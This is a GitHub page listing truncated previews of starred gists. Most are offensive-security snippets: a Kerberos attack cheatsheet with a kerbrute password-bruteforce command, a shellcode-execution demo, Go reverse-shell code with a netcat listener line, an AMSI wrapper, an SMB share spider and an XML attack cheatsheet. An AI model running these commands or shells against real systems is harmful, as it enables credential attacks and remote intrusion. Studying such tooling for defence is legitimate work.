Skip to content

Instantly share code, notes, and snippets.

View joeminicucci's full-sized avatar

m1n1 joeminicucci

43 followers · 58 following
View GitHub Profile
@HarmJ0y
HarmJ0y / Jenkinsfile
Created November 2, 2020 23:15
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@knethteo
knethteo / kerberos_attacks_cheatsheet.md
Last active March 11, 2022 06:28 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@TheWover
TheWover / EtwpTest.cs
Created May 6, 2020 22:03
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@russcam
russcam / Procmon.ps1
Created November 3, 2018 05:47
PowerShell Script module for interacting with Process Monitor (Procmon)
<#
.Synopsis
Functions for working with Process monitor
.Link
https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
#>
#Requires -Version 3.0
New-Module -Name Procmon -Scriptblock {
@wassname
wassname / Samsung Smart-TV Blocklist Adlist (for PiHole)
Last active May 6, 2024 04:28
# This is a blocklist to block samsung smart tv's sending meta data at home.
# Please help to collect domains!
# It could be that the TV does not receive any more updates or other services no longer work. Please report such an incident.
abtauthprd.samsungcloudsolution.com
acr0.samsungcloudsolution.com
ad.samsungadhub.com
ads.samsungads.com
amauthprd.samsungcloudsolution.com
api-hub.samsungyosemite.com
@FrankSpierings
FrankSpierings / spider.py
Last active August 12, 2021 21:26
Python SMB Spider (impacket)
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb3structs import FILE_READ_DATA
from time import strftime, localtime
import re
import logging
log = logging.getLogger()
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.DEBUG, datefmt='%I:%M:%S')
@moloch--
moloch-- / Makefile
Last active April 26, 2023 00:55
Basic cross-platform reverse shell in Go
EXE = shell
SRC = .
LDFLAGS = -ldflags="-s -w"
windows:
GOOS=windows go build -o $(EXE)_win.exe $(LDFLAGS) $(SRC)
macos:
GOOS=darwin go build -o $(EXE)_macos $(LDFLAGS) $(SRC)
@yougg
yougg / reversecmd.go
Last active April 7, 2024 04:01 — forked from takeshixx/shell.go
Golang reverse shell
// +build windows
// Reverse Windows CMD
// Test with nc -lvvp 6666
package main
import (
"bufio"
"net"
"os/exec"
@masthoon
masthoon / amsi.py
Last active April 9, 2023 12:33
AMSI Interface in Python
import sys
import windows
import windows.winproxy
import windows.generated_def as gdef
class AMSIProxy(windows.winproxy.ApiProxy):
APIDLL = "Amsi"
default_error_check = staticmethod(windows.winproxy.no_error_check)
"""
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.